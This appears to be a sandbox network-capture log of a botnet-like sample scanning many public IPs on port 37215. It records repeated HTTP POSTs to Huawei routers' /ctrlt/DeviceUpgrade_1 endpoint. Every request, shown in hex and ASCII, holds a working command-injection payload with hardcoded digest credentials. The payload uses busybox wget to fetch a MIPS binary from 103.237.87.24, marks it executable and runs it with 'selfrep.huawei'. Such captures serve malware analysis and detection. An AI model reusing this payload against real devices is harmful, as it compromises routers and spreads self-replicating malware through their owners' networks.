20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1152192.168.2.135703641.11.195.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443682909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1153192.168.2.1358186112.209.166.1437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443685055 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1154192.168.2.134496441.69.229.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443965912 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1155192.168.2.134159441.145.32.20437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443973064 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1156192.168.2.135034641.180.195.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.443991899 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1157192.168.2.135866074.238.104.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444000006 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1158192.168.2.134595041.240.178.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444026947 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1159192.168.2.134714041.79.27.19137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444041967 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1160192.168.2.1344786117.255.61.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444143057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1161192.168.2.1357244157.190.24.3137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444153070 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1162192.168.2.1354940197.74.46.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:00.444184065 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
